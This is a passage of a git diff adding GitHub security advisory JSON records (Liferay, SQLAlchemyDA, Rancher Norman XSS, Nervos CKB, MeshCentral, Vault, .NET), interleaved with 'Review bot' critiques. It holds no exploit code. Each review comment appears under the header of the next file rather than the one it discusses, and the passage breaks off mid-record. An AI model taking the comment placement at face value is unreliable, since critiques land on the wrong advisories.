+ "url": "https://github.com/line/centraldogma/commit/8edcf913b88101aff70008156b0881850e005783"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-02T16:55:20Z",
+ "nvd_published_at": "2024-02-02T06:15:45Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2024/02/GHSA-qwj8-qgpr-8crm/GHSA-qwj8-qgpr-8crm.json b/advisories/github-reviewed/2024/02/GHSA-qwj8-qgpr-8crm/GHSA-qwj8-qgpr-8crm.json
new file mode 100644
index 0000000000000..c3f061f506535
--- /dev/null
+++ b/advisories/github-reviewed/2024/02/GHSA-qwj8-qgpr-8crm/GHSA-qwj8-qgpr-8crm.json
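Review bot: The withdrawal names the canonical advisory GHSA-34q3-p352-c7q8 only in prose; there is no `references` entry for it, so tooling that lands on this withdrawn record (for instance via the NVD link for CVE-2024-1143, whose alias has been dropped) cannot machine-resolve the replacement. Add `{ "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-34q3-p352-c7q8" }` to `references`. The affected range and the MODERATE rating are kept on a withdrawn record while `severity` is empty; a one-line statement in the details that ranges and scoring should be taken from the canonical advisory would avoid double counting in scanners that do not honour `withdrawn`.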
@@ -0,0 +1,99 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-qwj8-qgpr-8crm",
+ "modified": "2024-02-08T18:31:19Z",
+ "published": "2024-02-08T06:30:23Z",
+ "aliases": [
+ "CVE-2024-25148"
+ ],
+ "summary": "Liferay Portal vulnerable to user impersonation",
+ "details": "In Liferay Portal 7.2.0 through 7.4.1, and older unsupported versions, and Liferay DXP 7.3 before service pack 3, 7.2 before fix pack 15, and older unsupported versions the `doAsUserId` URL parameter may get leaked when creating linked content using the WYSIWYG editor and while impersonating a user. This may allow remote authenticated users to impersonate a user after accessing the linked content.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "com.liferay.portal:release.portal.bom"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "7.2.0"
+ },
+ {
+ "fixed": "7.4.2"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "com.liferay.portal:release.dxp.bom"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "7.2.0"
+ },
+ {
+ "fixed": "7.2.10.fp15"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "com.liferay.portal:release.dxp.bom"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "7.3.0"
+ },
+ {
+ "fixed": "7.3.10.u4"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-25148"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/liferay/liferay-portal"
+ },
+ {
+ "type": "WEB",
+ "url": "https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25148"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-200"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-08T18:31:19Z",
+ "nvd_published_at": "2024-02-08T04:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2024/02/GHSA-r3jc-3qmm-w3pw/GHSA-r3jc-3qmm-w3pw.json b/advisories/github-reviewed/2024/02/GHSA-r3jc-3qmm-w3pw/GHSA-r3jc-3qmm-w3pw.json
new file mode 100644
index 0000000000000..5159fb2410fe9
--- /dev/null
+++ b/advisories/github-reviewed/2024/02/GHSA-r3jc-3qmm-w3pw/GHSA-r3jc-3qmm-w3pw.json
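Review bot: The DXP 7.3 range's `fixed` value `7.3.10.u4` does not obviously correspond to the details, which say "7.3 before service pack 3"; if service pack 3 and update 4 are different releases the range either under- or over-reports, so the mapping should be confirmed against the linked liferay.dev entry before this ships. The other two ranges do line up with the prose (Portal 7.2.0–7.4.1 → fixed 7.4.2; DXP 7.2 fix pack 15 → `7.2.10.fp15`). For responders, the operational detail missing here is where the leak lands: `doAsUserId` is a URL parameter, so a leaked value presumably ends up in the linked content's URLs and therefore in access logs and referrers, and the details say only that it "may get leaked" without saying where to look.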
@@ -0,0 +1,65 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-r3jc-3qmm-w3pw",
+ "modified": "2024-02-07T17:28:26Z",
+ "published": "2024-02-07T17:28:26Z",
+ "aliases": [
+ "CVE-2024-24811"
+ ],
+ "summary": "SQLAlchemyDA unauthenticated arbitrary SQL query execution",
+ "details": "### Impact\nThe vulnerability allows unauthenticated execution of arbitrary SQL statements on the database the SQLAlchemyDA instance is connected to. All users are affected.\n\n### Patches\nThe problem has been patched in version 2.2.\n\n### Workarounds\nThere is no workaround. All users are urged to upgrade to version 2.2\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "PyPI",
+ "name": "Products.SQLAlchemyDA"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "2.2"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/zopefoundation/Products.SQLAlchemyDA/security/advisories/GHSA-r3jc-3qmm-w3pw"
+ },
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24811"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/zopefoundation/Products.SQLAlchemyDA/commit/e682b99f8406f20bc3f0f2c77153ed7345fd215a"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/zopefoundation/Products.SQLAlchemyDA"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-89"
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-07T17:28:26Z",
+ "nvd_published_at": "2024-02-07T15:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2024/02/GHSA-r8f4-hv23-6qp6/GHSA-r8f4-hv23-6qp6.json b/advisories/github-reviewed/2024/02/GHSA-r8f4-hv23-6qp6/GHSA-r8f4-hv23-6qp6.json
new file mode 100644
index 0000000000000..eeca3d4997ff8
--- /dev/null
+++ b/advisories/github-reviewed/2024/02/GHSA-r8f4-hv23-6qp6/GHSA-r8f4-hv23-6qp6.json
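Review bot: The details never say how the unauthenticated SQL execution is reached — which published method or URL path, and what a request looks like — so a reader cannot tell whether a given Zope deployment actually exposes it, nor write a detection for exploitation attempts; CWE-89 and a 9.8 vector are asserted without the vector being described. Commit e682b99 is referenced and presumably adds a permission declaration to a method the ZPublisher was exposing, but that is a guess from here and should be confirmed and summarized in `details` in one sentence naming the method and the permission now required. "There is no workaround" is also stronger than the visible text supports: if the exposure is a publishable method, restricting access to the DA object at the Zope level or in front of it is a plausible stopgap that should be stated or explicitly ruled out.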
@@ -0,0 +1,77 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-r8f4-hv23-6qp6",
+ "modified": "2024-02-08T18:45:49Z",
+ "published": "2024-02-08T18:45:49Z",
+ "aliases": [
+ "CVE-2023-32193"
+ ],
+ "summary": "Norman API Cross-site Scripting Vulnerability",
+ "details": "### Impact\nA vulnerability has been identified in which unauthenticated cross-site scripting (XSS) in Norman's public API endpoint can be exploited. This can lead to an attacker exploiting the vulnerability to trigger JavaScript code and execute commands remotely. \n\nThe attack vector was identified as a Reflected XSS.\n\nNorman API propagates malicious payloads from user input to the UI, which renders the output. For example, a malicious URL gets rendered into a script that is executed on a page.\n\nThe changes addressed by this fix are:\n- Encode input that comes from the request URL before adding it to the response.\n- The request input is escaped by changing the URL construction that is used for links to use `url.URL`.\n- The request input is escaped by escaping the JavaScript and CSS variables with attribute encoding as defined by [OWASP](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#output-encoding-rules-summary).\n\n### Patches\nPatched versions include the following commits:\n\n| Branch | Commit |\n| -------- | ------- |\n| master | 3bb70b7 |\n| release/v2.8 | a6a6cf5 |\n| release/v2.7 | cb54924 |\n| release/v2.7.s3 | 7b2b467 |\n| release/v2.6 | bd13c65 |\n\n### Workarounds\nThere is no direct mitigation besides updating Norman API to a patched version.\n\n### References\nIf you have any questions or comments about this advisory:\n\n- Reach out to the [SUSE Rancher Security team](https://github.com/rancher/rancher/security/policy) for security-related inquiries.\n- Open an issue in the [Rancher](https://github.com/rancher/rancher/issues/new/choose) repository.\n- Verify with our [support matrix](https://www.suse.com/suse-rancher/support-matrix/all-supported-versions/) and [product support lifecycle](https://www.suse.com/lifecycle/).\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Go",
+ "name": "github.com/rancher/norman"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "0.0.0-20240207153100-3bb70b772b52"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/rancher/norman/security/advisories/GHSA-r8f4-hv23-6qp6"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/rancher/norman/commit/3bb70b772b52297feac64f5fdeb1b13c06c37e39"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/rancher/norman/commit/7b2b467995e6dfab6d4a5dee8dffc15033ae8269"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/rancher/norman/commit/a6a6cf5696088c32002953d36b75bdcc84f2399e"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/rancher/norman/commit/bd13c653293b9b5e0b37e8a6ccd1c3277f4623ed"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/rancher/norman/commit/cb54924f25c7666511a913cd41834299ef22dba4"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/rancher/norman"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-80"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-08T18:45:49Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2024/02/GHSA-r9rv-9mh8-pxf4/GHSA-r9rv-9mh8-pxf4.json b/advisories/github-reviewed/2024/02/GHSA-r9rv-9mh8-pxf4/GHSA-r9rv-9mh8-pxf4.json
new file mode 100644
index 0000000000000..4b52ce3144fcc
--- /dev/null
+++ b/advisories/github-reviewed/2024/02/GHSA-r9rv-9mh8-pxf4/GHSA-r9rv-9mh8-pxf4.json
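Review bot: The single Go range with `fixed` = `0.0.0-20240207153100-3bb70b772b52` cannot express the four branch fixes the details list (release/v2.8 a6a6cf5, v2.7 cb54924, v2.7.s3 7b2b467, v2.6 bd13c65): Go pseudo-versions order by timestamp, so a module pinned to a release-branch commit dated before 2024-02-07T15:31:00Z is flagged even when it carries its branch's patch, and one dated after is reported fixed even if it does not. Either add one range per branch with that branch's pseudo-version, or say in `details` that only `master` is modelled so Rancher consumers do not rely on this record for branch builds. The classification also looks off: the text describes reflected XSS via request-URL input rendered into JavaScript/CSS, which is CWE-79 rather than the basic-XSS CWE-80, and the C:H/I:H vector rests on the unexplained claim that script execution lets an attacker "execute commands remotely" — that chain should be stated or the score revisited.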
@@ -0,0 +1,57 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-r9rv-9mh8-pxf4",
+ "modified": "2024-02-02T22:23:07Z",
+ "published": "2024-02-02T22:23:07Z",
+ "aliases": [
+
+ ],
+ "summary": "Nervos CKB BlockTimeTooNew should not be considered as invalid block",
+ "details": "### Impact\n\nCurrently, when a node receives a block in future according to its local wall clock, it will mark the block as invalid and ban the peer. \n\nIf the header's timestamp is more than 15 seconds ahead of our current time. In that case, the header may become valid in the future, and we don't want to disconnect a peer merely for serving us one too-far-ahead block header, to prevent an attacker from splitting the network by mining a block right at the 15 seconds boundary.\n\n### Patches\n\nUpgrade to v0.33.1 or above.\n\n### Workarounds\nDon't ban peer serving too-far-ahead block header.",
+ "severity": [
+
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "crates.io",
+ "name": "ckb"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "0.33.1"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 0.33.0"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/nervosnetwork/ckb/security/advisories/GHSA-r9rv-9mh8-pxf4"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/nervosnetwork/ckb/commit/760d447c8b600df0539debe80b1625836fc72819"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-02T22:23:07Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2024/02/GHSA-v269-rrr6-cx6r/GHSA-v269-rrr6-cx6r.json b/advisories/github-reviewed/2024/02/GHSA-v269-rrr6-cx6r/GHSA-v269-rrr6-cx6r.json
new file mode 100644
index 0000000000000..cdee3c48df5af
--- /dev/null
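Review bot: The details say the peer should no longer be banned for a header more than 15 seconds ahead but never say what happens to the block itself, and the workaround `Don't ban peer serving too-far-ahead block header` reads as if the block is simply accepted; the security-relevant question is whether the too-far-ahead block is still rejected (or held until local time catches up) and only the ban is dropped, since accepting it would change consensus rather than just peer scoring. Presumably commit 760d447 keeps the rejection, but that is not visible here and should be stated in `details`. The second paragraph is also a fragment (`If the header's timestamp is more than 15 seconds ahead of our current time. In that case, ...`); rewritten as one sentence it would also make clear that 15 seconds is the existing tolerance, not a new one. As with the sibling CKB records, `severity` and `cwe_ids` are empty while the record carries a MODERATE rating.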
+++ b/advisories/github-reviewed/2024/02/GHSA-v269-rrr6-cx6r/GHSA-v269-rrr6-cx6r.json
@@ -0,0 +1,66 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-v269-rrr6-cx6r",
+ "modified": "2024-02-02T20:16:20Z",
+ "published": "2024-02-02T18:30:32Z",
+ "aliases": [
+ "CVE-2023-51838"
+ ],
+ "summary": "Ylianst MeshCentral 1.1.16 suffers from Use of a Broken or Risky Cryptographic Algorithm.",
+ "details": "Ylianst MeshCentral 1.1.16 suffers from Use of a Broken or Risky Cryptographic Algorithm.",
+ "severity": [
+
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "npm",
+ "name": "meshcentral"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "last_affected": "1.1.16"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51838"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/Ylianst/MeshCentral"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/Ylianst/MeshCentral/tree/master"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/tianjk99/Cryptographic-Misuses/blob/main/Bug_MeshCentral.md"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/tianjk99/Cryptographic-Misuses/blob/main/CVE-2023-51838.md"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-02T20:16:20Z",
+ "nvd_published_at": "2024-02-02T16:15:53Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2024/02/GHSA-vgh3-mwxq-rcp8/GHSA-vgh3-mwxq-rcp8.json b/advisories/github-reviewed/2024/02/GHSA-vgh3-mwxq-rcp8/GHSA-vgh3-mwxq-rcp8.json
new file mode 100644
index 0000000000000..bc95b80ac4c72
--- /dev/null
+++ b/advisories/github-reviewed/2024/02/GHSA-vgh3-mwxq-rcp8/GHSA-vgh3-mwxq-rcp8.json
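Review bot: This record gives a responder nothing to act on: `details` repeats the summary verbatim, `cwe_ids` is empty even though the summary is literally the CWE-327 title, there is no CVSS vector, and the only substantive references are a third-party research repository rather than an upstream commit, issue or release note. The range ends with `last_affected: 1.1.16` and no `fixed` event, so versions after 1.1.16 are simply not covered — neither known vulnerable nor known fixed; if upstream has not acknowledged the issue the details should say so, and if it has, the fixing version should replace `last_affected`. At minimum add `"CWE-327"` to `cwe_ids` and one sentence in `details` naming the algorithm or call site the linked write-up identifies, so the record can be triaged without following external links.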
@@ -0,0 +1,69 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-vgh3-mwxq-rcp8",
+ "modified": "2024-02-01T20:52:34Z",
+ "published": "2024-02-01T03:30:22Z",
+ "aliases": [
+ "CVE-2024-0831"
+ ],
+ "summary": "Hashicorp Vault may expose sensitive log information",
+ "details": "Vault and Vault Enterprise (“Vault”) may expose sensitive information when enabling an audit device which specifies the `log_raw` option, which may log sensitive information to other audit devices, regardless of whether they are configured to use `log_raw`.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Go",
+ "name": "github.com/hashicorp/vault"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "1.15.0"
+ },
+ {
+ "fixed": "1.15.5"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0831"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/hashicorp/vault/commit/2a72f2a8a5b57de88c22a2a94c4a5f08c6f3770b"
+ },
+ {
+ "type": "WEB",
+ "url": "https://developer.hashicorp.com/vault/docs/upgrading/upgrade-to-1.15.x#audit-devices-could-log-raw-data-despite-configuration"
+ },
+ {
+ "type": "WEB",
+ "url": "https://discuss.hashicorp.com/t/hcsec-2024-01-vault-may-expose-sensitive-information-when-configuring-an-audit-log-device/62311"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/hashicorp/vault"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-532"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-02-01T20:52:34Z",
+ "nvd_published_at": "2024-02-01T02:15:46Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2024/02/GHSA-vh55-786g-wjwj/GHSA-vh55-786g-wjwj.json b/advisories/github-reviewed/2024/02/GHSA-vh55-786g-wjwj/GHSA-vh55-786g-wjwj.json
new file mode 100644
index 0000000000000..68fab16104b9e
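Review bot: The record describes the leak but not the cleanup: upgrading to 1.15.5 stops new raw entries, yet anything already written to the other audit devices while a `log_raw` device was enabled stays in those sinks, so operators who ran `log_raw` on 1.15.0–1.15.4 should treat those audit logs as containing secrets (restrict access, review retention, rotate credentials that appear in them). The details should say that explicitly, or reference the remediation guidance in the linked HCSEC-2024-01 bulletin if it has any. A one-line `Workarounds` note such as `Until upgraded, do not enable log_raw on any audit device` would also help, though I cannot confirm from the visible text that removing the `log_raw` device alone stops the leakage. The PR:H/UI:R vector is consistent with the prose — an operator has to enable the option — and CWE-532 fits.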
--- /dev/null
+++ b/advisories/github-reviewed/2024/02/GHSA-vh55-786g-wjwj/GHSA-vh55-786g-wjwj.json
@@ -0,0 +1,581 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vh55-786g-wjwj", + "modified": "2024-02-03T00:47:54Z", + "published": "2024-02-03T00:47:54Z", + "aliases": [ + + ], + "summary": ".NET Information Disclosure Vulnerability", + "details": "Microsoft is releasing this security advisory to provide information about a vulnerability in .NET Core 3.1 and .NET 6.0. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.\n\nAn information disclosure vulnerability exists in .NET Core 3.1 and .NET 6.0 that could lead to unauthorized access of privileged information.\n\n## Affected software\n\n* Any .NET 6.0 application running on .NET 6.0.7 or earlier.\n* Any .NET Core 3.1 applicaiton running on .NET Core 3.1.27 or earlier.\n\nIf your application uses the following package versions, ensure you update to the latest version of .NET.\n\n### .NET Core 3.1\n\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[System.Security.Cryptography.Xml](http://system.security)| <=4.7.0| 4.7.1\n[Microsoft.AspNetCore.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x64)| >=3.1.0, 3.1.27| 3.1.28\n[Microsoft.AspNetCore.App.Runtime.linux-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-x64)| >=3.1.0, 3.1.27| 3.1.28\n[Microsoft.AspNetCore.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x86)| >=3.1.0, 3.1.27| 3.1.28\n[Microsoft.AspNetCore.App.Runtime.osx-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.osx-x64)| >=3.1.0, 3.1.27| 3.1.28\n[Microsoft.AspNetCore.App.Runtime.linux-musl-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-x64)| >=3.1.0, 3.1.27| 3.1.28\n[Microsoft.AspNetCore.App.Runtime.linux-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-arm64)| >=3.1.0, 3.1.27| 
3.1.28\n[Microsoft.AspNetCore.App.Runtime.linux-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-arm)| >=3.1.0, 3.1.27| 3.1.28\n[Microsoft.AspNetCore.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm64)| >=3.1.0, 3.1.27| 3.1.28\n[Microsoft.AspNetCore.App.Runtime.win-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm)| >=3.1.0, 3.1.27| 3.1.28\n[Microsoft.AspNetCore.App.Runtime.linux-musl-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-arm64)| >=3.1.0, 3.1.27| 3.1.28\n[Microsoft.AspNetCore.App.Runtime.linux-musl-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-arm)| >=3.1.0, 3.1.27| 3.1.28\n\n### .NET 6\n\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[System.Security.Cryptography.Xml](https://www.nuget.org/packages/System.Security.Cryptography.Xml)| >=5.0.0, 6.0.0| 6.0.1\n[Microsoft.AspNetCore.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x64)| >=6.0.0, 6.0.7| 6.0.8\n[Microsoft.AspNetCore.App.Runtime.linux-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-x64)| >=6.0.0, 6.0.7| 6.0.8\n[Microsoft.AspNetCore.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x86)| >=6.0.0, 6.0.7| 6.0.8\n[Microsoft.AspNetCore.App.Runtime.osx-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.osx-x64)| >=6.0.0, 6.0.7| 6.0.8\n[Microsoft.AspNetCore.App.Runtime.linux-musl-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-x64)| >=6.0.0, 6.0.7| 6.0.8\n[Microsoft.AspNetCore.App.Runtime.linux-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-arm64)| >=6.0.0, 6.0.7| 6.0.8\n[Microsoft.AspNetCore.App.Runtime.linux-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-arm)| 
>=6.0.0, 6.0.7| 6.0.8\n[Microsoft.AspNetCore.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm64)| >=6.0.0, 6.0.7| 6.0.8\n[Microsoft.AspNetCore.App.Runtime.win-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm)| >=6.0.0, 6.0.7| 6.0.8\n[Microsoft.AspNetCore.App.Runtime.osx-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.osx-arm64)| >=6.0.0, 6.0.7| 6.0.8\n[Microsoft.AspNetCore.App.Runtime.linux-musl-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-arm64)| >=6.0.0, 6.0.7| 6.0.8\n[Microsoft.AspNetCore.App.Runtime.linux-musl-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-arm)| >=6.0.0, 6.0.7| 6.0.8\n\n## Patches\n\n\n* If you're using .NET 6.0, you should download and install Runtime 6.0.8 or SDK 6.0.108 (for Visual Studio 2022 v17.1) from https://dotnet.microsoft.com/download/dotnet-core/6.0.\n* If you're using .NET Core 3.1, you should download and install Runtime 3.1.28 (for Visual Studio 2019 v16.9) from https://dotnet.microsoft.com/download/dotnet-core/3.1.\n\n\n### Other\n\nAnnouncement for this issue can be found at https://github.com/dotnet/announcements/issues/232\nAn Issue for this can be found at https://github.com/dotnet/aspnetcore/issues/43166\nMSRC details for this can be found at https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34716", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "NuGet", + "name": "System.Security.Cryptography.Xml" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.7.1" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 4.7.0" + } + }, + { + "package": { + "ecosystem": "NuGet", + "name": "System.Security.Cryptography.Xml" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.0.0" + }, + { + "fixed": "6.0.1" + } + ] + } + 
], + "database_specific": { + "last_known_affected_version_range": "<= 6.0.0" + } + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Microsoft.AspNetCore.App.Runtime.win-x64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.1.0" + }, + { + "fixed": "3.1.28" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.1.27" + } + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Microsoft.AspNetCore.App.Runtime.win-x64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "6.0.0" + }, + { + "fixed": "6.0.8" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 6.0.7" + } + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Microsoft.AspNetCore.App.Runtime.linux-x64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.1.0" + }, + { + "fixed": "3.1.28" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.1.27" + } + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Microsoft.AspNetCore.App.Runtime.linux-x64" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "6.0.0" + }, + { + "fixed": "6.0.8" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 6.0.7" + } + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Microsoft.AspNetCore.App.Runtime.win-x86" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.1.0" + }, + { + "fixed": "3.1.28" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.1.27" + } + }, + { + "package": { + "ecosystem": "NuGet", + "name": "Microsoft.AspNetCore.App.Runtime.win-x86" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "6.0.0" + }, + { + "fixed": "6.0.8" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 6.0.7" + } + }, + { + "package": { + 
